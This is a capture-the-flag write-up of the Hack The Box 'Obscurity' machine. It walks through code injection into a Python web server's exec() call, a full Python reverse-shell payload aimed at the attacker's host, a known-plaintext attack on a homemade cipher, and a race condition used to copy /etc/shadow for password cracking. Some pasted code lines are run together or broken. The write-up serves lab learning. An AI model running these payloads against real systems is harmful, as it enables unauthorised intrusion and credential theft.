[HTB] Obscurity — Write-up

bigb0ss
bigb0ss
May 10 · 8 min read
Image for post
Image for postImage for post

Welcome to the Obscruity write-up! This was a medium-difficulty Linux box and required players to find a flaw in the python-based web server to gain the initial access. Once we gain initial access with a reverse shell, then, we will need to analyze another python script that encrypts the password. Then, we can do a Known-Plaintext Attack (“KPA”) to recover the second user’s password. Finally, for the root access, we can abuse the race-condition on the existing BetterSSH.py script to read the /etc/shadow file and crack the password for the “root” user. Pretty fun box and let’s get started!


Image for post
Image for postImage for post

Recon

Nmap

$ nmap -Pn — open -sC -sV -p- -T4 10.10.10.168
Image for post
Image for postImage for post

Interesting Ports to Note:

Image for post
Image for postImage for post

We can read some intention/motto of this website:

Image for post
Image for postImage for post

But one interesting content is the following. It is stating that we can see the current web server source code (“SuperSecureServer.py”) within a secret directory:

Image for post
Image for postImage for post

Web Directory Fuzzing

Image for post
Image for postImage for post

When we go to the /develop/SuperSecureServer.py, we can see the source code of the web server.

Image for post
Image for postImage for post

Initial Foothold + User Access #1 (www-data)

Source Code Analysis

Image for post
Image for postImage for post

With that “exec(),” we can do a python syscall to execute system commands:

### Example Usage of exec()
# python
Python 2.7.18 (default, Apr 20 2020, 20:30:41)
[GCC 9.3.0] on linux2
>>> import os
>>> exec(os.system("whoami"))
root

Remote Code Execution (“RCE”) on the Web Server

In order to understand the right syntax to execute python code, we can create a simplified version of the above vulnerable code to test:

[exploit.py] - Local RCE Attemptimport os
import urllib.parse
path = """'; os.system("whoami");'""" path = urllib.parse.unquote(path)
info = "output = 'Document: {}'"
exec(info.format(path))

When we run the exploit.py on our local box, we get the following output:

Image for post
Image for postImage for post

Nice. Let’s update our script and see if we can do a RCE on the box.

[exploit.py] - Remote "Ping" Command Attemptimport os
import urllib.parse
import requests
url = 'http://10.10.10.168:8080/'path = """'; os.system("ping -c 1 10.10.14.39");'"""# URL Encode Mode
path = urllib.parse.unquote(path)
#info = "output = 'Document: {}'"
#exec(info.format(path))
r = requests.get(url + path)print(r.status_code)
print(r.headers)
print(r.text)

When we run the exploit.py, we can confirm a successful RCE on the box.

Image for post
Image for postImage for post

Reverse Shell

[exploit.py] - Python Reverse Shellimport os
import urllib.parse
import requests
url = 'http://10.10.10.168:8080/'path = """'; import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.39",8055));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"""# URL Encode Mode
path = urllib.parse.unquote(path)
#info = "output = 'Document: {}'"
#exec(info.format(path))
r = requests.get(url + path)print(r.status_code)
print(r.headers)
print(r.text)

When we run the exploit.py, we will successfully get the reverse shell as “www-data” user.

Image for post
Image for postImage for post

User Access #2 (robert)

In order to escalate to another user (“robert”), we need to solve another python script challenge. We can see a couple of interesting file within the “robert”’s home directory.

Image for post
Image for postImage for post
  • SuperSecureCrypt.py: This is a script to use for encrypting/decrypting files.
Image for post
Image for postImage for post
First part of the “SuperSecureCrypt.py” script
  • check.txt: It’s an ASCII text file. And this file is saying that:
check.txt + key ----[Encrypt]----> out.txt
Image for post
Image for postImage for post
  • out.txt: It’s an UTF-8 Unicode text. It’s the output file of the encrypted check.txt file.
Image for post
Image for postImage for post
  • passwordreminder.txt: It’s also an UTF-8 Unicode text. Assuming that this is some type of a password file, and we need a valid key to decrypt it.
Image for post
Image for postImage for post

Known-plaintext Attack (“KPA”)

The python encrypt/decrypt script is already given to us, and we can see it’s help page:

Image for post
Image for postImage for post

It’s pretty self-explanatory. In an attempt to get a key, let’s supply

### KPA Attack
$ python3 SuperSecureCrypt.py -i out.txt -o /dev/shm/key.txt -k 'Encrypting this file with your key should result in out.txt, make sure your key is correct!' -d
-i = out.txt # File that we want to decrypt
-k = plaintext from check.txt # Supplying the plaintext as key
-o = key.txt # Output for the key
-d # Decrypt mode
Image for post
Image for postImage for post

When we cat the key.txt file, we can see the key = alexandrovich. (Seemed like it kept repeated for each character)

$ cat /dev/shm/key.txt
alexandrovichalexandrovichalexandrovichalexandrovichalexandrovichalexandrovichalexandrovich
Image for post
Image for postImage for post

With this key, we can now decrypt the passwordreminder.txt file to get a plaintext password for the “robert” user.

### Getting robert's Password
$ python3 SuperSecureCrypt.py -i passwordreminder.txt -o /dev/shm/robert_pw.txt -k 'alexandrovich' -d
Image for post
Image for postImage for post

user.txt

Image for post
Image for postImage for post

Root Access

First thing we may want to check is if “robert” user can do any sudo actions. And, it found that the user can do sudo to run the BetterSSH.py script. Looks like it’s going to be another python challenge. (It’s like pythonPythonPYTHON :P)

Image for post
Image for postImage for post

Path #1 — Race-condition Exploit

Image for post
Image for postImage for post

To exploit this, we can create a simple infinite loop of copying everything from /tmp/SSH to somewhere else where “robert” user can access and read. While that is running, we will run the sudo /usr/bin/python3 /home/robert/BetterSSH/BetterSSH.py command to write the /etc/shadow file into the /tmp directory.

$ cat /tmp/copy.sh 
#!/bin/bash
mkdir = '/tmp/SSH'while true
do
cp /tmp/SSH/* /dev/shm/
done
Image for post
Image for postImage for post

Once authenticated, we can check the /dev/shm and see the copied /etc/shadow file with “root” password hash.

Image for post
Image for postImage for post

Feed the hash into John with the rockyou.txt wordlist. This will crack the “root” user password = “mercedes.”

Image for post
Image for postImage for post

root.txt

Image for post
Image for postImage for post

Path #2 — Sudo User Overwrite Exploit

Image for post
Image for postImage for post

This can be abused because Linux tends to take its preference over the last supplied arguments. For example,

_____Hidden_____|_______Display________
(sudo -u robert) $ id # Takes robert
(sudo -u robert) $ -u root id # Takes root
(sudo -u robert) $ -u root -u robert id # Takes robert
Image for post
Image for postImage for post

So doing that we can simply cat the root.txt file as well.

Image for post
Image for postImage for post

Conclusion

This was really enjoyable box doing a lot of code review and exploiting vulnerable functions within the code. It was pretty python heavy, but don’t we all like doing everything with python tho? :) Honestly, it was really fun journey doing the Obscruity box.

Hope you enjoyed my write-up and thank you for reading!

Image for post
Image for postImage for post

InfoSec Write-ups

A collection of write-ups from the best hackers in the…

bigb0ss

Written by

bigb0ss

\x90\x90 — Penetration Tester | “Love Building Brain Muscles” in ExpDev, CTF, Reversing, RedTeam, Evasion Techniques

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

bigb0ss

Written by

bigb0ss

\x90\x90 — Penetration Tester | “Love Building Brain Muscles” in ExpDev, CTF, Reversing, RedTeam, Evasion Techniques

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store